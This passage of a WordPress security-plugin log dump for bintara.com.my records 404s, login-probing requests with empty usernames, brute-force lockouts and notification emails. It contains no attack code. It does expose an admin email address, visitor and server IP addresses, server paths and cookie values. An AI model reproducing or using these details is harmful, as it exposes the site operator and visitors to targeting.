21:05:47',31265776,32719568,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(27036,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 21:05:49','2019-09-25 21:05:47',31888552,32719568,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(27037,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYviG8IxHKnBK@s1FldGBgAAAU8\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"52002\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYviG8IxHKnBK@s1FldGBgAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569448475.869\";s:12:\"REQUEST_TIME\";s:10:\"1569448475\";}}','notice','2019-09-25 21:54:38','2019-09-25 21:54:36',31322976,33131320,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(27038,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=8dfd74d0f2356dc29a898eb18f7c002d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYviRbjw0hTms86NOnw79AAAAZI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"124.217.235.145\";s:11:\"REMOTE_PORT\";s:5:\"47028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYviRbjw0hTms86NOnw79AAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569448517.1262\";s:12:\"REQUEST_TIME\";s:10:\"1569448517\";}}','notice','2019-09-25 21:55:18','2019-09-25 21:55:17',31181560,32719536,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.145'),(27039,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 05:55:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 21:55:17\";s:14:\"lockout_expire\";s:19:\"2019-09-30 09:55:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 01:55:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 21:55:18','2019-09-25 21:55:17',31263024,32719536,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.145'),(27040,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 21:55:18','2019-09-25 21:55:17',31885520,32719536,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.145'),(27041,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e0b533f41b171c31bc284c85a713e27a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55095\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvtSRUSlOK4dwtqdubV4gAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569451337.8696\";s:12:\"REQUEST_TIME\";s:10:\"1569451337\";}}','notice','2019-09-25 22:42:19','2019-09-25 22:42:18',30822528,32638416,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27042,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"52962\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvt0MIxHKnBK@s1FldJJAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569451472.5735\";s:12:\"REQUEST_TIME\";s:10:\"1569451472\";}}','notice','2019-09-25 22:44:34','2019-09-25 22:44:32',30821408,32638400,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27043,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=53126970c51d66cbdf8f4dd786b7e557\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvvv8IxHKnBK@s1FldKdQAAAUM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.86\";s:11:\"REMOTE_PORT\";s:5:\"41100\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvvv8IxHKnBK@s1FldKdQAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569451967.7727\";s:12:\"REQUEST_TIME\";s:10:\"1569451967\";}}','notice','2019-09-25 22:52:49','2019-09-25 22:52:48',31184808,32718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27044,0,'lockout','host-lockout::103.6.198.86','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"103.6.198.86\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 06:52:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 22:52:48\";s:14:\"lockout_expire\";s:19:\"2019-09-30 10:52:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 02:52:48\";s:12:\"lockout_host\";s:12:\"103.6.198.86\";}','action','2019-09-25 22:52:49','2019-09-25 22:52:48',31266968,32718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27045,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"103.6.198.86\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 06:52:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 22:52:48\";s:14:\"lockout_expire\";s:19:\"2019-09-30 10:52:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 02:52:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 22:52:49','2019-09-25 22:52:48',31266952,32718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27046,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 22:52:49','2019-09-25 22:52:48',31890520,32718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27047,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:127:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvwtHIO9r9oxFSVqE@FlwAAANM\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:12:\"117.27.80.96\";s:11:\"REMOTE_PORT\";s:5:\"20321\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvwtHIO9r9oxFSVqE@FlwAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569452212.4636\";s:12:\"REQUEST_TIME\";s:10:\"1569452212\";}}','notice','2019-09-25 22:56:54','2019-09-25 22:56:52',31318848,33125920,'https://bintara.com.my/our-history/about1/',1,0,'117.27.80.96'),(27048,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"62746\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvxgMIxHKnBK@s1FldLWQAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569452416.7525\";s:12:\"REQUEST_TIME\";s:10:\"1569452416\";}}','notice','2019-09-25 23:00:19','2019-09-25 23:00:17',31215728,33027216,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27049,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b91da4d82460a3491c4266a8ce9b96b3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 